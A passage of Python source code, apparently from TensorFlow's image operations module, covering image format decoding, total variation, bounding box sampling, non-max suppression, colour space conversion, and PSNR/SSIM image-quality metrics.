bmp_channels = 0 if channels is None else channels
good_channels = math_ops.not_equal(bmp_channels, 1, name='check_channels')
channels_msg = 'Channels must be in (None, 0, 3) when decoding BMP images'
assert_channels = control_flow_ops.Assert(good_channels, [channels_msg])
with ops.control_dependencies([assert_decode, assert_channels]):
return convert_image_dtype(gen_image_ops.decode_bmp(contents), dtype)
def _gif():
# Create assert to make sure that channels is not set to 1
# Already checked above that channels is in (None, 0, 1, 3)
gif_channels = 0 if channels is None else channels
good_channels = math_ops.logical_and(
math_ops.not_equal(gif_channels, 1, name='check_gif_channels'),
math_ops.not_equal(gif_channels, 4, name='check_gif_channels'))
channels_msg = 'Channels must be in (None, 0, 3) when decoding GIF images'
assert_channels = control_flow_ops.Assert(good_channels, [channels_msg])
with ops.control_dependencies([assert_channels]):
return convert_image_dtype(gen_image_ops.decode_gif(contents), dtype)
def check_gif():
# Create assert op to check that bytes are GIF decodable
is_gif = math_ops.equal(substr, b'\x47\x49\x46', name='is_gif')
return control_flow_ops.cond(is_gif, _gif, _bmp, name='cond_gif')
def _png():
"""Decodes a PNG image."""
return convert_image_dtype(
gen_image_ops.decode_png(contents, channels,
dtype=dtypes.uint8
if dtype == dtypes.uint8
else dtypes.uint16), dtype)
def check_png():
"""Checks if an image is PNG."""
return control_flow_ops.cond(
_is_png(contents), _png, check_gif, name='cond_png')
def _jpeg():
"""Decodes a jpeg image."""
jpeg_channels = 0 if channels is None else channels
good_channels = math_ops.not_equal(
jpeg_channels, 4, name='check_jpeg_channels')
channels_msg = ('Channels must be in (None, 0, 1, 3) when decoding JPEG '
'images')
assert_channels = control_flow_ops.Assert(good_channels, [channels_msg])
with ops.control_dependencies([assert_channels]):
return convert_image_dtype(
gen_image_ops.decode_jpeg(contents, channels), dtype)
# Decode normal JPEG images (start with \xff\xd8\xff\xe0)
# as well as JPEG images with EXIF data (start with \xff\xd8\xff\xe1).
return control_flow_ops.cond(
is_jpeg(contents), _jpeg, check_png, name='cond_jpeg')
@tf_export('image.total_variation')
def total_variation(images, name=None):
"""Calculate and return the total variation for one or more images.
The total variation is the sum of the absolute differences for neighboring
pixel-values in the input images. This measures how much noise is in the
images.
This can be used as a loss-function during optimization so as to suppress
noise in images. If you have a batch of images, then you should calculate
the scalar loss-value as the sum:
`loss = tf.reduce_sum(tf.image.total_variation(images))`
This implements the anisotropic 2-D version of the formula described here:
https://en.wikipedia.org/wiki/Total_variation_denoising
Args:
images: 4-D Tensor of shape `[batch, height, width, channels]` or
3-D Tensor of shape `[height, width, channels]`.
name: A name for the operation (optional).
Raises:
ValueError: if images.shape is not a 3-D or 4-D vector.
Returns:
The total variation of `images`.
If `images` was 4-D, return a 1-D float Tensor of shape `[batch]` with the
total variation for each image in the batch.
If `images` was 3-D, return a scalar float with the total variation for
that image.
"""
with ops.name_scope(name, 'total_variation'):
ndims = images.get_shape().ndims
if ndims == 3:
# The input is a single image with shape [height, width, channels].
# Calculate the difference of neighboring pixel-values.
# The images are shifted one pixel along the height and width by slicing.
pixel_dif1 = images[1:, :, :] - images[:-1, :, :]
pixel_dif2 = images[:, 1:, :] - images[:, :-1, :]
# Sum for all axis. (None is an alias for all axis.)
sum_axis = None
elif ndims == 4:
# The input is a batch of images with shape:
# [batch, height, width, channels].
# Calculate the difference of neighboring pixel-values.
# The images are shifted one pixel along the height and width by slicing.
pixel_dif1 = images[:, 1:, :, :] - images[:, :-1, :, :]
pixel_dif2 = images[:, :, 1:, :] - images[:, :, :-1, :]
# Only sum for the last 3 axis.
# This results in a 1-D tensor with the total variation for each image.
sum_axis = [1, 2, 3]
else:
raise ValueError('\'images\' must be either 3 or 4-dimensional.')
# Calculate the total variation by taking the absolute value of the
# pixel-differences and summing over the appropriate axis.
tot_var = (
math_ops.reduce_sum(math_ops.abs(pixel_dif1), axis=sum_axis) +
math_ops.reduce_sum(math_ops.abs(pixel_dif2), axis=sum_axis))
return tot_var
@tf_export('image.sample_distorted_bounding_box', v1=[])
def sample_distorted_bounding_box_v2(image_size,
bounding_boxes,
seed=0,
min_object_covered=0.1,
aspect_ratio_range=None,
area_range=None,
max_attempts=None,
use_image_if_no_bounding_boxes=None,
name=None):
"""Generate a single randomly distorted bounding box for an image.
Bounding box annotations are often supplied in addition to ground-truth labels
in image recognition or object localization tasks. A common technique for
training such a system is to randomly distort an image while preserving
its content, i.e. *data augmentation*. This Op outputs a randomly distorted
localization of an object, i.e. bounding box, given an `image_size`,
`bounding_boxes` and a series of constraints.
The output of this Op is a single bounding box that may be used to crop the
original image. The output is returned as 3 tensors: `begin`, `size` and
`bboxes`. The first 2 tensors can be fed directly into `tf.slice` to crop the
image. The latter may be supplied to `tf.image.draw_bounding_boxes` to
visualize what the bounding box looks like.
Bounding boxes are supplied and returned as `[y_min, x_min, y_max, x_max]`.
The bounding box coordinates are floats in `[0.0, 1.0]` relative to the width
and height of the underlying image.
For example,
```python
# Generate a single distorted bounding box.
begin, size, bbox_for_draw = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bounding_boxes,
min_object_covered=0.1)
# Draw the bounding box in an image summary.
image_with_box = tf.image.draw_bounding_boxes(tf.expand_dims(image, 0),
bbox_for_draw)
tf.summary.image('images_with_box', image_with_box)
# Employ the bounding box to distort the image.
distorted_image = tf.slice(image, begin, size)
```
Note that if no bounding box information is available, setting
`use_image_if_no_bounding_boxes = true` will assume there is a single implicit
bounding box covering the whole image. If `use_image_if_no_bounding_boxes` is
false and no bounding boxes are supplied, an error is raised.
Args:
image_size: A `Tensor`. Must be one of the following types: `uint8`, `int8`,
`int16`, `int32`, `int64`.
1-D, containing `[height, width, channels]`.
bounding_boxes: A `Tensor` of type `float32`.
3-D with shape `[batch, N, 4]` describing the N bounding boxes
associated with the image.
seed: An optional `int`. Defaults to `0`.
If `seed` is set to non-zero, the random number generator is seeded by
the given `seed`. Otherwise, it is seeded by a random seed.
min_object_covered: A Tensor of type `float32`. Defaults to `0.1`.
The cropped area of the image must contain at least this
fraction of any bounding box supplied. The value of this parameter should
be non-negative. In the case of 0, the cropped area does not need to
overlap any of the bounding boxes supplied.
aspect_ratio_range: An optional list of `floats`. Defaults to `[0.75,
1.33]`.
The cropped area of the image must have an aspect `ratio =
width / height` within this range.
area_range: An optional list of `floats`. Defaults to `[0.05, 1]`.
The cropped area of the image must contain a fraction of the
supplied image within this range.
max_attempts: An optional `int`. Defaults to `100`.
Number of attempts at generating a cropped region of the image
of the specified constraints. After `max_attempts` failures, return the
entire image.
use_image_if_no_bounding_boxes: An optional `bool`. Defaults to `False`.
Controls behavior if no bounding boxes supplied.
If true, assume an implicit bounding box covering the whole input. If
false, raise an error.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (begin, size, bboxes).
begin: A `Tensor`. Has the same type as `image_size`. 1-D, containing
`[offset_height, offset_width, 0]`. Provide as input to
`tf.slice`.
size: A `Tensor`. Has the same type as `image_size`. 1-D, containing
`[target_height, target_width, -1]`. Provide as input to
`tf.slice`.
bboxes: A `Tensor` of type `float32`. 3-D with shape `[1, 1, 4]` containing
the distorted bounding box.
Provide as input to `tf.image.draw_bounding_boxes`.
"""
seed1, seed2 = random_seed.get_seed(seed) if seed else (0, 0)
return sample_distorted_bounding_box(
image_size, bounding_boxes, seed1, seed2, min_object_covered,
aspect_ratio_range, area_range, max_attempts,
use_image_if_no_bounding_boxes, name)
@tf_export(v1=['image.sample_distorted_bounding_box'])
@deprecation.deprecated(date=None, instructions='`seed2` arg is deprecated.'
'Use sample_distorted_bounding_box_v2 instead.')
def sample_distorted_bounding_box(image_size,
bounding_boxes,
seed=None,
seed2=None,
min_object_covered=0.1,
aspect_ratio_range=None,
area_range=None,
max_attempts=None,
use_image_if_no_bounding_boxes=None,
name=None):
"""Generate a single randomly distorted bounding box for an image.
Bounding box annotations are often supplied in addition to ground-truth labels
in image recognition or object localization tasks. A common technique for
training such a system is to randomly distort an image while preserving
its content, i.e. *data augmentation*. This Op outputs a randomly distorted
localization of an object, i.e. bounding box, given an `image_size`,
`bounding_boxes` and a series of constraints.
The output of this Op is a single bounding box that may be used to crop the
original image. The output is returned as 3 tensors: `begin`, `size` and
`bboxes`. The first 2 tensors can be fed directly into `tf.slice` to crop the
image. The latter may be supplied to `tf.image.draw_bounding_boxes` to
visualize
what the bounding box looks like.
Bounding boxes are supplied and returned as `[y_min, x_min, y_max, x_max]`.
The
bounding box coordinates are floats in `[0.0, 1.0]` relative to the width and
height of the underlying image.
For example,
```python
# Generate a single distorted bounding box.
begin, size, bbox_for_draw = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bounding_boxes,
min_object_covered=0.1)
# Draw the bounding box in an image summary.
image_with_box = tf.image.draw_bounding_boxes(tf.expand_dims(image, 0),
bbox_for_draw)
tf.summary.image('images_with_box', image_with_box)
# Employ the bounding box to distort the image.
distorted_image = tf.slice(image, begin, size)
```
Note that if no bounding box information is available, setting
`use_image_if_no_bounding_boxes = true` will assume there is a single implicit
bounding box covering the whole image. If `use_image_if_no_bounding_boxes` is
false and no bounding boxes are supplied, an error is raised.
Args:
image_size: A `Tensor`. Must be one of the following types: `uint8`, `int8`,
`int16`, `int32`, `int64`.
1-D, containing `[height, width, channels]`.
bounding_boxes: A `Tensor` of type `float32`.
3-D with shape `[batch, N, 4]` describing the N bounding boxes
associated with the image.
seed: An optional `int`. Defaults to `0`.
If either `seed` or `seed2` are set to non-zero, the random number
generator is seeded by the given `seed`. Otherwise, it is seeded by a
random
seed.
seed2: An optional `int`. Defaults to `0`.
A second seed to avoid seed collision.
min_object_covered: A Tensor of type `float32`. Defaults to `0.1`.
The cropped area of the image must contain at least this
fraction of any bounding box supplied. The value of this parameter should
be
non-negative. In the case of 0, the cropped area does not need to overlap
any of the bounding boxes supplied.
aspect_ratio_range: An optional list of `floats`. Defaults to `[0.75,
1.33]`.
The cropped area of the image must have an aspect ratio =
width / height within this range.
area_range: An optional list of `floats`. Defaults to `[0.05, 1]`.
The cropped area of the image must contain a fraction of the
supplied image within this range.
max_attempts: An optional `int`. Defaults to `100`.
Number of attempts at generating a cropped region of the image
of the specified constraints. After `max_attempts` failures, return the
entire
image.
use_image_if_no_bounding_boxes: An optional `bool`. Defaults to `False`.
Controls behavior if no bounding boxes supplied.
If true, assume an implicit bounding box covering the whole input. If
false,
raise an error.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (begin, size, bboxes).
begin: A `Tensor`. Has the same type as `image_size`. 1-D, containing
`[offset_height, offset_width, 0]`. Provide as input to
`tf.slice`.
size: A `Tensor`. Has the same type as `image_size`. 1-D, containing
`[target_height, target_width, -1]`. Provide as input to
`tf.slice`.
bboxes: A `Tensor` of type `float32`. 3-D with shape `[1, 1, 4]` containing
the distorted bounding box.
Provide as input to `tf.image.draw_bounding_boxes`.
"""
with ops.name_scope(name, 'sample_distorted_bounding_box'):
return gen_image_ops.sample_distorted_bounding_box_v2(
image_size,
bounding_boxes,
seed=seed,
seed2=seed2,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=use_image_if_no_bounding_boxes,
name=name)
@tf_export('image.non_max_suppression')
def non_max_suppression(boxes,
scores,
max_output_size,
iou_threshold=0.5,
score_threshold=float('-inf'),
name=None):
"""Greedily selects a subset of bounding boxes in descending order of score.
Prunes away boxes that have high intersection-over-union (IOU) overlap
with previously selected boxes. Bounding boxes are supplied as
[y1, x1, y2, x2], where (y1, x1) and (y2, x2) are the coordinates of any
diagonal pair of box corners and the coordinates can be provided as normalized
(i.e., lying in the interval [0, 1]) or absolute. Note that this algorithm
is agnostic to where the origin is in the coordinate system. Note that this
algorithm is invariant to orthogonal transformations and translations
of the coordinate system; thus translating or reflections of the coordinate
system result in the same boxes being selected by the algorithm.
The output of this operation is a set of integers indexing into the input
collection of bounding boxes representing the selected boxes. The bounding
box coordinates corresponding to the selected indices can then be obtained
using the `tf.gather operation`. For example:
selected_indices = tf.image.non_max_suppression(
boxes, scores, max_output_size, iou_threshold)
selected_boxes = tf.gather(boxes, selected_indices)
Args:
boxes: A 2-D float `Tensor` of shape `[num_boxes, 4]`.
scores: A 1-D float `Tensor` of shape `[num_boxes]` representing a single
score corresponding to each box (each row of boxes).
max_output_size: A scalar integer `Tensor` representing the maximum number
of boxes to be selected by non max suppression.
iou_threshold: A float representing the threshold for deciding whether boxes
overlap too much with respect to IOU.
score_threshold: A float representing the threshold for deciding when to
remove boxes based on score.
name: A name for the operation (optional).
Returns:
selected_indices: A 1-D integer `Tensor` of shape `[M]` representing the
selected indices from the boxes tensor, where `M <= max_output_size`.
"""
with ops.name_scope(name, 'non_max_suppression'):
iou_threshold = ops.convert_to_tensor(iou_threshold, name='iou_threshold')
score_threshold = ops.convert_to_tensor(
score_threshold, name='score_threshold')
return gen_image_ops.non_max_suppression_v3(boxes, scores, max_output_size,
iou_threshold, score_threshold)
@tf_export('image.non_max_suppression_padded')
def non_max_suppression_padded(boxes,
scores,
max_output_size,
iou_threshold=0.5,
score_threshold=float('-inf'),
pad_to_max_output_size=False,
name=None):
"""Greedily selects a subset of bounding boxes in descending order of score.
Performs algorithmically equivalent operation to tf.image.non_max_suppression,
with the addition of an optional parameter which zero-pads the output to
be of size `max_output_size`.
The output of this operation is a tuple containing the set of integers
indexing into the input collection of bounding boxes representing the selected
boxes and the number of valid indices in the index set. The bounding box
coordinates corresponding to the selected indices can then be obtained using
the `tf.slice` and `tf.gather` operations. For example:
selected_indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes, scores, max_output_size, iou_threshold,
score_threshold, pad_to_max_output_size=True)
selected_indices = tf.slice(
selected_indices_padded, tf.constant([0]), num_valid)
selected_boxes = tf.gather(boxes, selected_indices)
Args:
boxes: A 2-D float `Tensor` of shape `[num_boxes, 4]`.
scores: A 1-D float `Tensor` of shape `[num_boxes]` representing a single
score corresponding to each box (each row of boxes).
max_output_size: A scalar integer `Tensor` representing the maximum number
of boxes to be selected by non max suppression.
iou_threshold: A float representing the threshold for deciding whether boxes
overlap too much with respect to IOU.
score_threshold: A float representing the threshold for deciding when to
remove boxes based on score.
pad_to_max_output_size: bool. If True, size of `selected_indices` output
is padded to `max_output_size`.
name: A name for the operation (optional).
Returns:
selected_indices: A 1-D integer `Tensor` of shape `[M]` representing the
selected indices from the boxes tensor, where `M <= max_output_size`.
valid_outputs: A scalar integer `Tensor` denoting how many elements in
`selected_indices` are valid. Valid elements occur first, then padding.
"""
with ops.name_scope(name, 'non_max_suppression_padded'):
iou_threshold = ops.convert_to_tensor(iou_threshold, name='iou_threshold')
score_threshold = ops.convert_to_tensor(
score_threshold, name='score_threshold')
if compat.forward_compatible(2018, 8, 7) or pad_to_max_output_size:
return gen_image_ops.non_max_suppression_v4(
boxes, scores, max_output_size, iou_threshold, score_threshold,
pad_to_max_output_size)
else:
return gen_image_ops.non_max_suppression_v3(
boxes, scores, max_output_size, iou_threshold, score_threshold)
@tf_export('image.non_max_suppression_overlaps')
def non_max_suppression_with_overlaps(overlaps,
scores,
max_output_size,
overlap_threshold=0.5,
score_threshold=float('-inf'),
name=None):
"""Greedily selects a subset of bounding boxes in descending order of score.
Prunes away boxes that have high overlap with previously selected boxes.
N-by-n overlap values are supplied as square matrix.
The output of this operation is a set of integers indexing into the input
collection of bounding boxes representing the selected boxes. The bounding
box coordinates corresponding to the selected indices can then be obtained
using the `tf.gather operation`. For example:
selected_indices = tf.image.non_max_suppression_overlaps(
overlaps, scores, max_output_size, iou_threshold)
selected_boxes = tf.gather(boxes, selected_indices)
Args:
overlaps: A 2-D float `Tensor` of shape `[num_boxes, num_boxes]`.
scores: A 1-D float `Tensor` of shape `[num_boxes]` representing a single
score corresponding to each box (each row of boxes).
max_output_size: A scalar integer `Tensor` representing the maximum number
of boxes to be selected by non max suppression.
overlap_threshold: A float representing the threshold for deciding whether
boxes overlap too much with respect to the provided overlap values.
score_threshold: A float representing the threshold for deciding when to
remove boxes based on score.
name: A name for the operation (optional).
Returns:
selected_indices: A 1-D integer `Tensor` of shape `[M]` representing the
selected indices from the overlaps tensor, where `M <= max_output_size`.
"""
with ops.name_scope(name, 'non_max_suppression_overlaps'):
overlap_threshold = ops.convert_to_tensor(
overlap_threshold, name='overlap_threshold')
# pylint: disable=protected-access
return gen_image_ops.non_max_suppression_with_overlaps(
overlaps, scores, max_output_size, overlap_threshold, score_threshold)
# pylint: enable=protected-access
_rgb_to_yiq_kernel = [[0.299, 0.59590059,
0.2115], [0.587, -0.27455667, -0.52273617],
[0.114, -0.32134392, 0.31119955]]
@tf_export('image.rgb_to_yiq')
def rgb_to_yiq(images):
"""Converts one or more images from RGB to YIQ.
Outputs a tensor of the same shape as the `images` tensor, containing the YIQ
value of the pixels.
The output is only well defined if the value in images are in [0,1].
Args:
images: 2-D or higher rank. Image data to convert. Last dimension must be
size 3.
Returns:
images: tensor with the same shape as `images`.
"""
images = ops.convert_to_tensor(images, name='images')
kernel = ops.convert_to_tensor(
_rgb_to_yiq_kernel, dtype=images.dtype, name='kernel')
ndims = images.get_shape().ndims
return math_ops.tensordot(images, kernel, axes=[[ndims - 1], [0]])
_yiq_to_rgb_kernel = [[1, 1, 1], [0.95598634, -0.27201283, -1.10674021],
[0.6208248, -0.64720424, 1.70423049]]
@tf_export('image.yiq_to_rgb')
def yiq_to_rgb(images):
"""Converts one or more images from YIQ to RGB.
Outputs a tensor of the same shape as the `images` tensor, containing the RGB
value of the pixels.
The output is only well defined if the Y value in images are in [0,1],
I value are in [-0.5957,0.5957] and Q value are in [-0.5226,0.5226].
Args:
images: 2-D or higher rank. Image data to convert. Last dimension must be
size 3.
Returns:
images: tensor with the same shape as `images`.
"""
images = ops.convert_to_tensor(images, name='images')
kernel = ops.convert_to_tensor(
_yiq_to_rgb_kernel, dtype=images.dtype, name='kernel')
ndims = images.get_shape().ndims
return math_ops.tensordot(images, kernel, axes=[[ndims - 1], [0]])
_rgb_to_yuv_kernel = [[0.299, -0.14714119,
0.61497538], [0.587, -0.28886916, -0.51496512],
[0.114, 0.43601035, -0.10001026]]
@tf_export('image.rgb_to_yuv')
def rgb_to_yuv(images):
"""Converts one or more images from RGB to YUV.
Outputs a tensor of the same shape as the `images` tensor, containing the YUV
value of the pixels.
The output is only well defined if the value in images are in [0,1].
Args:
images: 2-D or higher rank. Image data to convert. Last dimension must be
size 3.
Returns:
images: tensor with the same shape as `images`.
"""
images = ops.convert_to_tensor(images, name='images')
kernel = ops.convert_to_tensor(
_rgb_to_yuv_kernel, dtype=images.dtype, name='kernel')
ndims = images.get_shape().ndims
return math_ops.tensordot(images, kernel, axes=[[ndims - 1], [0]])
_yuv_to_rgb_kernel = [[1, 1, 1], [0, -0.394642334, 2.03206185],
[1.13988303, -0.58062185, 0]]
@tf_export('image.yuv_to_rgb')
def yuv_to_rgb(images):
"""Converts one or more images from YUV to RGB.
Outputs a tensor of the same shape as the `images` tensor, containing the RGB
value of the pixels.
The output is only well defined if the Y value in images are in [0,1],
U and V value are in [-0.5,0.5].
Args:
images: 2-D or higher rank. Image data to convert. Last dimension must be
size 3.
Returns:
images: tensor with the same shape as `images`.
"""
images = ops.convert_to_tensor(images, name='images')
kernel = ops.convert_to_tensor(
_yuv_to_rgb_kernel, dtype=images.dtype, name='kernel')
ndims = images.get_shape().ndims
return math_ops.tensordot(images, kernel, axes=[[ndims - 1], [0]])
def _verify_compatible_image_shapes(img1, img2):
"""Checks if two image tensors are compatible for applying SSIM or PSNR.
This function checks if two sets of images have ranks at least 3, and if the
last three dimensions match.
Args:
img1: Tensor containing the first image batch.
img2: Tensor containing the second image batch.
Returns:
A tuple containing: the first tensor shape, the second tensor shape, and a
list of control_flow_ops.Assert() ops implementing the checks.
Raises:
ValueError: When static shape check fails.
"""
shape1 = img1.get_shape().with_rank_at_least(3)
shape2 = img2.get_shape().with_rank_at_least(3)
shape1[-3:].assert_is_compatible_with(shape2[-3:])
if shape1.ndims is not None and shape2.ndims is not None:
for dim1, dim2 in zip(reversed(shape1.dims[:-3]),
reversed(shape2.dims[:-3])):
if not (dim1 == 1 or dim2 == 1 or dim1.is_compatible_with(dim2)):
raise ValueError(
'Two images are not compatible: %s and %s' % (shape1, shape2))
# Now assign shape tensors.
shape1, shape2 = array_ops.shape_n([img1, img2])
# TODO(sjhwang): Check if shape1[:-3] and shape2[:-3] are broadcastable.
checks = []
checks.append(control_flow_ops.Assert(
math_ops.greater_equal(array_ops.size(shape1), 3),
[shape1, shape2], summarize=10))
checks.append(control_flow_ops.Assert(
math_ops.reduce_all(math_ops.equal(shape1[-3:], shape2[-3:])),
[shape1, shape2], summarize=10))
return shape1, shape2, checks
@tf_export('image.psnr')
def psnr(a, b, max_val, name=None):
"""Returns the Peak Signal-to-Noise Ratio between a and b.
This is intended to be used on signals (or images). Produces a PSNR value for
each image in batch.
The last three dimensions of input are expected to be [height, width, depth].
Example:
```python
# Read images from file.
im1 = tf.decode_png('path/to/im1.png')
im2 = tf.decode_png('path/to/im2.png')
# Compute PSNR over tf.uint8 Tensors.
psnr1 = tf.image.psnr(im1, im2, max_val=255)
# Compute PSNR over tf.float32 Tensors.
im1 = tf.image.convert_image_dtype(im1, tf.float32)
im2 = tf.image.convert_image_dtype(im2, tf.float32)
psnr2 = tf.image.psnr(im1, im2, max_val=1.0)
# psnr1 and psnr2 both have type tf.float32 and are almost equal.
```
Arguments:
a: First set of images.
b: Second set of images.
max_val: The dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
name: Namespace to embed the computation in.
Returns:
The scalar PSNR between a and b. The returned tensor has type `tf.float32`
and shape [batch_size, 1].
"""
with ops.name_scope(name, 'PSNR', [a, b]):
# Need to convert the images to float32. Scale max_val accordingly so that
# PSNR is computed correctly.
max_val = math_ops.cast(max_val, a.dtype)
max_val = convert_image_dtype(max_val, dtypes.float32)
a = convert_image_dtype(a, dtypes.float32)
b = convert_image_dtype(b, dtypes.float32)
mse = math_ops.reduce_mean(math_ops.squared_difference(a, b), [-3, -2, -1])
psnr_val = math_ops.subtract(
20 * math_ops.log(max_val) / math_ops.log(10.0),
np.float32(10 / np.log(10)) * math_ops.log(mse),
name='psnr')
_, _, checks = _verify_compatible_image_shapes(a, b)
with ops.control_dependencies(checks):
return array_ops.identity(psnr_val)
_SSIM_K1 = 0.01
_SSIM_K2 = 0.03
def _ssim_helper(x, y, reducer, max_val, compensation=1.0):
r"""Helper function for computing SSIM.
SSIM estimates covariances with weighted sums. The default parameters
use a biased estimate of the covariance:
Suppose `reducer` is a weighted sum, then the mean estimators are
\mu_x = \sum_i w_i x_i,
\mu_y = \sum_i w_i y_i,
where w_i's are the weighted-sum weights, and covariance estimator is
cov_{xy} = \sum_i w_i (x_i - \mu_x) (y_i - \mu_y)
with assumption \sum_i w_i = 1. This covariance estimator is biased, since
E[cov_{xy}] = (1 - \sum_i w_i ^ 2) Cov(X, Y).
For SSIM measure with unbiased covariance estimators, pass as `compensation`
argument (1 - \sum_i w_i ^ 2).
Arguments:
x: First set of images.
y: Second set of images.
reducer: Function that computes 'local' averages from set of images.
For non-covolutional version, this is usually tf.reduce_mean(x, [1, 2]),
and for convolutional version, this is usually tf.nn.avg_pool or
tf.nn.conv2d with weighted-sum kernel.
max_val: The dynamic range (i.e., the difference between the maximum
possible allowed value and the minimum allowed value).
compensation: Compensation factor. See above.
Returns:
A pair containing the luminance measure, and the contrast-structure measure.
"""
c1 = (_SSIM_K1 * max_val) ** 2
c2 = (_SSIM_K2 * max_val) ** 2
# SSIM luminance measure is
# (2 * mu_x * mu_y + c1) / (mu_x ** 2 + mu_y ** 2 + c1).
mean0 = reducer(x)
mean1 = reducer(y)
num0 = mean0 * mean1 * 2.0
den0 = math_ops.square(mean0) + math_ops.square(mean1)
luminance = (num0 + c1) / (den0 + c1)
# SSIM contrast-structure measure is
# (2 * cov_{xy} + c2) / (cov_{xx} + cov_{yy} + c2).
# Note that `reducer` is a weighted sum with weight w_k, \sum_i w_i = 1, then
# cov_{xy} = \sum_i w_i (x_i - \mu_x) (y_i - \mu_y)
# = \sum_i w_i x_i y_i - (\sum_i w_i x_i) (\sum_j w_j y_j).
num1 = reducer(x * y) * 2.0
den1 = reducer(math_ops.square(x) + math_ops.square(y))
c2 *= compensation
cs = (num1 - num0 + c2) / (den1 - den0 + c2)
# SSIM score is the product of the luminance and contrast-structure measures.
return luminance, cs
def _fspecial_gauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function."""
size = ops.convert_to_tensor(size, dtypes.int32)
sigma = ops.convert_to_tensor(sigma)
coords = math_ops.cast(math_ops.range(size), sigma.dtype)
coords -= math_ops.cast(size - 1, sigma.dtype) / 2.0
g = math_ops.square(coords)
g *= -0.5 / math_ops.square(sigma)
g = array_ops.reshape(g, shape=[1, -1]) + array_ops.reshape(g, shape=[-1, 1])
g = array_ops.reshape(g, shape=[1, -1]) # For tf.nn.softmax().
g = nn_ops.softmax(g)
return array_ops.reshape(g, shape=[size, size, 1, 1])
def _ssim_per_channel(img1, img2, max_val=1.0):
"""Computes SSIM index between img1 and img2 per color channel.
This function matches the standard SSIM implementation from:
Wang, Z., Bovik, A. C., Sheikh, H. R., & Simoncelli, E. P. (2004). Image
quality assessment: from error visibility to structural similarity. IEEE
transactions on image processing.
Details:
- 11x11 Gaussian filter of width 1.5 is used.
- k1 = 0.01, k2 = 0.03 as in the original paper.
Args:
img1: First image batch.
img2: Second image batch.
max_val: The dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
Returns:
A pair of tensors containing and channel-wise SSIM and contrast-structure
values. The shape is [..., channels].
"""
filter_size = constant_op.constant(11, dtype=dtypes.int32)
filter_sigma = constant_op.constant(1.5, dtype=img1.dtype)
shape1, shape2 = array_ops.shape_n([img1, img2])
checks = [
control_flow_ops.Assert(math_ops.reduce_all(math_ops.greater_equal(
shape1[-3:-1], filter_size)), [shape1, filter_size], summarize=8),
control_flow_ops.Assert(math_ops.reduce_all(math_ops.greater_equal(
shape2[-3:-1], filter_size)), [shape2, filter_size], summarize=8)]
# Enforce the check to run before computation.
with ops.control_dependencies(checks):
img1 = array_ops.identity(img1)
# TODO(sjhwang): Try to cache kernels and compensation factor.
kernel = _fspecial_gauss(filter_size, filter_sigma)
kernel = array_ops.tile(kernel, multiples=[1, 1, shape1[-1], 1])
# The correct compensation factor is `1.0 - tf.reduce_sum(tf.square(kernel))`,
# but to match MATLAB implementation of MS-SSIM, we use 1.0 instead.
compensation = 1.0
# TODO(sjhwang): Try FFT.
# TODO(sjhwang): Gaussian kernel is separable in space. Consider applying
# 1-by-n and n-by-1 Gaussain filters instead of an n-by-n filter.
def reducer(x):
shape = array_ops.shape(x)
x = array_ops.reshape(x, shape=array_ops.concat([[-1], shape[-3:]], 0))
y = nn.depthwise_conv2d(x, kernel, strides=[1, 1, 1, 1], padding='VALID')
return array_ops.reshape(y, array_ops.concat([shape[:-3],
array_ops.shape(y)[1:]], 0))
luminance, cs = _ssim_helper(img1, img2, reducer, max_val, compensation)
# Average over the second and the third from the last: height, width.
axes = constant_op.constant([-3, -2], dtype=dtypes.int32)
ssim_val = math_ops.reduce_mean(luminance * cs, axes)
cs = math_ops.reduce_mean(cs, axes)
return ssim_val, cs
@tf_export('image.ssim')
def ssim(img1, img2, max_val):
"""Computes SSIM index between img1 and img2.
This function is based on the standard SSIM implementation from:
Wang, Z., Bovik, A. C., Sheikh, H. R., & Simoncelli, E. P. (2004). Image
quality assessment: from error visibility to structural similarity. IEEE
transactions on image processing.
Note: The true SSIM is only defined on grayscale. This function does not
perform any colorspace transform. (If input is already YUV, then it will
compute YUV SSIM average.)
Details:
- 11x11 Gaussian filter of width 1.5 is used.
- k1 = 0.01, k2 = 0.03 as in the original paper.
The image sizes must be at least 11x11 because of the filter size.
Example:
```python
# Read images from file.
im1 = tf.decode_png('path/to/im1.png')
im2 = tf.decode_png('path/to/im2.png')
# Compute SSIM over tf.uint8 Tensors.
ssim1 = tf.image.ssim(im1, im2, max_val=255)
# Compute SSIM over tf.float32 Tensors.
im1 = tf.image.convert_image_dtype(im1, tf.float32)
im2 = tf.image.convert_image_dtype(im2, tf.float32)
ssim2 = tf.image.ssim(im1, im2, max_val=1.0)
# ssim1 and ssim2 both have type tf.float32 and are almost equal.
```
Args:
img1: First image batch.
img2: Second image batch.
max_val: The dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
Returns:
A tensor containing an SSIM value for each image in batch. Returned SSIM
values are in range (-1, 1], when pixel values are non-negative. Returns
a tensor with shape: broadcast(img1.shape[:-3], img2.shape[:-3]).
"""
_, _, checks = _verify_compatible_image_shapes(img1, img2)
with ops.control_dependencies(checks):
img1 = array_ops.identity(img1)
# Need to convert the images to float32. Scale max_val accordingly so that
# SSIM is computed correctly.
max_val = math_ops.cast(max_val, img1.dtype)
max_val = convert_image_dtype(max_val, dtypes.float32)
img1 = convert_image_dtype(img1, dtypes.float32)
img2 = convert_image_dtype(img2, dtypes.float32)
ssim_per_channel, _ = _ssim_per_channel(img1, img2, max_val)
# Compute average over color channels.
return math_ops.reduce_mean(ssim_per_channel, [-1])
# Default values obtained by Wang et al.
_MSSSIM_WEIGHTS = (0.0448, 0.2856, 0.3001, 0.2363, 0.1333)
@tf_export('image.ssim_multiscale')
def ssim_multiscale(img1, img2, max_val, power_factors=_MSSSIM_WEIGHTS):
"""Computes the MS-SSIM between img1 and img2.
This function assumes that `img1` and `img2` are image batches, i.e. the last
three dimensions are [height, width, channels].
Note: The true SSIM is only defined on grayscale. This function does not
perform any colorspace transform. (If input is already YUV, then it will
compute YUV SSIM average.)
Original paper: Wang, Zhou, Eero P. Simoncelli, and Alan C. Bovik. "Multiscale
